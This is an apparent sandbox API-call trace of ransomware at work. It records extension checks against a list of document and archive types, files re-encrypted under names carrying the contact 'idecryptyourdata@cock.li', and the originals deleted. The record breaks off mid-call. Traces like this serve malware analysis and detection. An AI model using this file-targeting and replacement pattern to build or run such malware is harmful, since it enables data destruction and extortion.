[0049.051] WriteFile (in: hFile=0x2e0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xa080, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xa080, lpOverlapped=0x0) returned 1 [0049.053] ReadFile (in: hFile=0x2c4, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0049.053] WriteFile (in: hFile=0x2e0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xf4, lpOverlapped=0x0) returned 1 [0049.053] SetEndOfFile (hFile=0x2e0) returned 1 [0049.053] CloseHandle (hObject=0x2e0) returned 1 [0049.054] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0049.055] SetEndOfFile (hFile=0x2c4) returned 1 [0049.055] CloseHandle (hObject=0x2c4) returned 1 [0049.056] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0049.056] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp")) returned 1 [0049.056] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0049.056] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0049.056] lstrlenW (lpString=".doc") returned 4 [0049.056] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0049.056] lstrlenW (lpString=".docx") returned 5 [0049.056] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1 [0049.056] lstrlenW (lpString=".pdf") returned 4 [0049.056] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0049.056] lstrlenW (lpString=".xls") returned 4 [0049.056] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0049.056] lstrlenW (lpString=".xlsx") returned 5 [0049.056] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0049.056] lstrlenW (lpString=".ppt") returned 4 [0049.056] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0049.057] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0049.057] lstrlenW (lpString=".zip") returned 4 [0049.057] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0049.057] lstrlenW (lpString=".rar") returned 4 [0049.057] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0049.057] lstrlenW (lpString=".bz2") returned 4 [0049.057] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0049.057] lstrlenW (lpString=".7z") returned 3 [0049.057] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0049.057] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0049.057] lstrlenW (lpString=".dbf") returned 4 [0049.057] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0049.057] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0049.057] lstrlenW (lpString=".1cd") returned 4 [0049.057] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0049.057] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0049.057] lstrlenW (lpString=".jpg") returned 4 [0049.059] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0049.059] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0049.059] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0049.059] lstrlenW (lpString=".doc") returned 4 [0049.059] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0049.059] lstrlenW (lpString=".docx") returned 5 [0049.059] lstrcmpiW (lpString1=".docx", lpString2="n.bmp") returned -1 [0049.059] lstrlenW (lpString=".pdf") returned 4 [0049.059] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0049.059] lstrlenW (lpString=".xls") returned 4 [0049.059] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0049.059] lstrlenW (lpString=".xlsx") returned 5 [0049.059] lstrcmpiW (lpString1=".xlsx", lpString2="n.bmp") returned -1 [0049.059] lstrlenW (lpString=".ppt") returned 4 [0049.059] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0049.059] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0049.059] lstrlenW (lpString=".zip") returned 4 [0049.059] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0049.059] lstrlenW (lpString=".rar") returned 4 [0049.059] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0049.059] lstrlenW (lpString=".bz2") returned 4 [0049.059] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0049.059] lstrlenW (lpString=".7z") returned 3 [0049.059] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0049.059] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0049.059] lstrlenW (lpString=".dbf") returned 4 [0049.059] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0049.059] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0049.059] lstrlenW (lpString=".1cd") returned 4 [0049.059] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0049.059] lstrlenW (lpString="C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 38 [0049.059] lstrlenW (lpString=".jpg") returned 4 [0049.059] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0049.060] lstrcmpiW (lpString1=".bmp", lpString2=".bat") returned 1 [0049.060] lstrlenW (lpString="watermark.bmp") returned 13 [0049.060] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0049.060] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=104072) returned 1 [0049.060] CloseHandle (hObject=0x2c4) returned 1 [0049.060] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp")) returned 0x80 [0049.060] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0049.060] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0049.060] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0049.060] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0049.060] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0049.061] GetLastError () returned 0x0 [0049.061] ReadFile (in: hFile=0x2c4, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x19688, lpOverlapped=0x0) returned 1 [0053.704] WriteFile (in: hFile=0x2e0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x19690, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x19690, lpOverlapped=0x0) returned 1 [0053.706] ReadFile (in: hFile=0x2c4, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0053.706] WriteFile (in: hFile=0x2e0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xee, lpOverlapped=0x0) returned 1 [0053.706] SetEndOfFile (hFile=0x2e0) returned 1 [0053.706] CloseHandle (hObject=0x2e0) returned 1 [0053.708] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0053.708] SetEndOfFile (hFile=0x2c4) returned 1 [0053.710] CloseHandle (hObject=0x2c4) returned 1 [0053.710] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0053.710] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp")) returned 1 [0055.103] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0055.103] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0055.103] lstrlenW (lpString=".doc") returned 4 [0055.103] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0055.103] lstrlenW (lpString=".docx") returned 5 [0055.103] lstrcmpiW (lpString1=".docx", lpString2="k.bmp") returned -1 [0055.103] lstrlenW (lpString=".pdf") returned 4 [0055.104] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0055.104] lstrlenW (lpString=".xls") returned 4 [0055.104] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0055.104] lstrlenW (lpString=".xlsx") returned 5 [0055.104] lstrcmpiW (lpString1=".xlsx", lpString2="k.bmp") returned -1 [0055.104] lstrlenW (lpString=".ppt") returned 4 [0055.104] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0055.104] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0055.104] lstrlenW (lpString=".zip") returned 4 [0055.104] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0055.104] lstrlenW (lpString=".rar") returned 4 [0055.104] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0055.104] lstrlenW (lpString=".bz2") returned 4 [0055.104] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0055.104] lstrlenW (lpString=".7z") returned 3 [0055.104] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0055.104] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0055.104] lstrlenW (lpString=".dbf") returned 4 [0055.104] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0055.104] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0055.104] lstrlenW (lpString=".1cd") returned 4 [0055.104] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0055.104] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0055.104] lstrlenW (lpString=".jpg") returned 4 [0055.104] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0055.104] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0055.104] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0055.104] lstrlenW (lpString=".doc") returned 4 [0055.104] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0055.104] lstrlenW (lpString=".docx") returned 5 [0055.104] lstrcmpiW (lpString1=".docx", lpString2="k.bmp") returned -1 [0055.104] lstrlenW (lpString=".pdf") returned 4 [0055.104] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0055.104] lstrlenW (lpString=".xls") returned 4 [0055.105] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0055.105] lstrlenW (lpString=".xlsx") returned 5 [0055.105] lstrcmpiW (lpString1=".xlsx", lpString2="k.bmp") returned -1 [0055.105] lstrlenW (lpString=".ppt") returned 4 [0055.105] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0055.105] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0055.105] lstrlenW (lpString=".zip") returned 4 [0055.105] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0055.105] lstrlenW (lpString=".rar") returned 4 [0055.105] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0055.105] lstrlenW (lpString=".bz2") returned 4 [0055.105] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0055.105] lstrlenW (lpString=".7z") returned 3 [0055.105] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0055.105] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0055.105] lstrlenW (lpString=".dbf") returned 4 [0055.105] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0055.105] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0055.105] lstrlenW (lpString=".1cd") returned 4 [0055.105] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0055.105] lstrlenW (lpString="C:\\588bce7c90097ed212\\watermark.bmp") returned 35 [0055.105] lstrlenW (lpString=".jpg") returned 4 [0055.105] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0055.105] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0055.105] lstrlenW (lpString="Alphabet.xml") returned 12 [0055.105] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0055.248] GetFileSizeEx (in: hFile=0x2c0, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=791421) returned 1 [0055.248] CloseHandle (hObject=0x2c0) returned 1 [0055.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0055.248] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0055.248] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0055.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0055.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0055.248] lstrlenW (lpString=".doc") returned 4 [0055.248] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.248] lstrlenW (lpString=".docx") returned 5 [0055.248] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0055.248] lstrlenW (lpString=".pdf") returned 4 [0055.248] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.248] lstrlenW (lpString=".xls") returned 4 [0055.248] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.248] lstrlenW (lpString=".xlsx") returned 5 [0055.248] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0055.248] lstrlenW (lpString=".ppt") returned 4 [0055.249] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0055.249] lstrlenW (lpString=".zip") returned 4 [0055.249] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.249] lstrlenW (lpString=".rar") returned 4 [0055.249] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.249] lstrlenW (lpString=".bz2") returned 4 [0055.249] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.249] lstrlenW (lpString=".7z") returned 3 [0055.249] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0055.249] lstrlenW (lpString=".dbf") returned 4 [0055.249] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0055.249] lstrlenW (lpString=".1cd") returned 4 [0055.249] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0055.249] lstrlenW (lpString=".jpg") returned 4 [0055.249] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0055.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0055.249] lstrlenW (lpString=".doc") returned 4 [0055.249] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0055.249] lstrlenW (lpString=".docx") returned 5 [0055.249] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0055.249] lstrlenW (lpString=".pdf") returned 4 [0055.249] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0055.249] lstrlenW (lpString=".xls") returned 4 [0055.250] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0055.250] lstrlenW (lpString=".xlsx") returned 5 [0055.250] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0055.250] lstrlenW (lpString=".ppt") returned 4 [0055.250] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0055.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0055.250] lstrlenW (lpString=".zip") returned 4 [0055.250] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0055.250] lstrlenW (lpString=".rar") returned 4 [0055.250] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0055.250] lstrlenW (lpString=".bz2") returned 4 [0055.250] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0055.250] lstrlenW (lpString=".7z") returned 3 [0055.250] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0055.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0055.250] lstrlenW (lpString=".dbf") returned 4 [0055.250] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0055.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0055.250] lstrlenW (lpString=".1cd") returned 4 [0055.250] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0055.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml") returned 63 [0055.250] lstrlenW (lpString=".jpg") returned 4 [0055.250] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0055.250] lstrcmpiW (lpString1=".avi", lpString2=".bat") returned -1 [0055.250] lstrlenW (lpString="boxed-correct.avi") returned 17 [0055.251] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0056.067] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=111320) returned 1 [0056.068] CloseHandle (hObject=0x2c4) returned 1 [0056.068] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0056.068] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.068] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.068] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0056.068] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0056.068] lstrlenW (lpString=".doc") returned 4 [0056.068] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0056.068] lstrlenW (lpString=".docx") returned 5 [0056.068] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0056.068] lstrlenW (lpString=".pdf") returned 4 [0056.068] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0056.068] lstrlenW (lpString=".xls") returned 4 [0056.068] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0056.068] lstrlenW (lpString=".xlsx") returned 5 [0056.068] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0056.068] lstrlenW (lpString=".ppt") returned 4 [0056.068] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0056.068] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0056.068] lstrlenW (lpString=".zip") returned 4 [0056.068] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0056.068] lstrlenW (lpString=".rar") returned 4 [0056.068] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0056.069] lstrlenW (lpString=".bz2") returned 4 [0056.069] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0056.069] lstrlenW (lpString=".7z") returned 3 [0056.069] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0056.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0056.069] lstrlenW (lpString=".dbf") returned 4 [0056.069] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0056.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0056.069] lstrlenW (lpString=".1cd") returned 4 [0056.069] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0056.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0056.069] lstrlenW (lpString=".jpg") returned 4 [0056.069] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0056.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0056.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0056.069] lstrlenW (lpString=".doc") returned 4 [0056.069] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0056.069] lstrlenW (lpString=".docx") returned 5 [0056.069] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0056.069] lstrlenW (lpString=".pdf") returned 4 [0056.069] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0056.069] lstrlenW (lpString=".xls") returned 4 [0056.069] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0056.069] lstrlenW (lpString=".xlsx") returned 5 [0056.069] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0056.069] lstrlenW (lpString=".ppt") returned 4 [0056.069] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0056.069] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0056.069] lstrlenW (lpString=".zip") returned 4 [0056.069] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0056.069] lstrlenW (lpString=".rar") returned 4 [0056.070] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0056.070] lstrlenW (lpString=".bz2") returned 4 [0056.070] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0056.070] lstrlenW (lpString=".7z") returned 3 [0056.070] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0056.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0056.070] lstrlenW (lpString=".dbf") returned 4 [0056.070] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0056.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0056.070] lstrlenW (lpString=".1cd") returned 4 [0056.070] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0056.070] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0056.070] lstrlenW (lpString=".jpg") returned 4 [0056.070] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0056.070] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0056.070] lstrlenW (lpString="ipsar.xml") returned 9 [0056.070] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0056.412] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=2418) returned 1 [0056.412] CloseHandle (hObject=0x334) returned 1 [0056.412] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml")) returned 0x20 [0056.412] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0056.412] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.412] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft 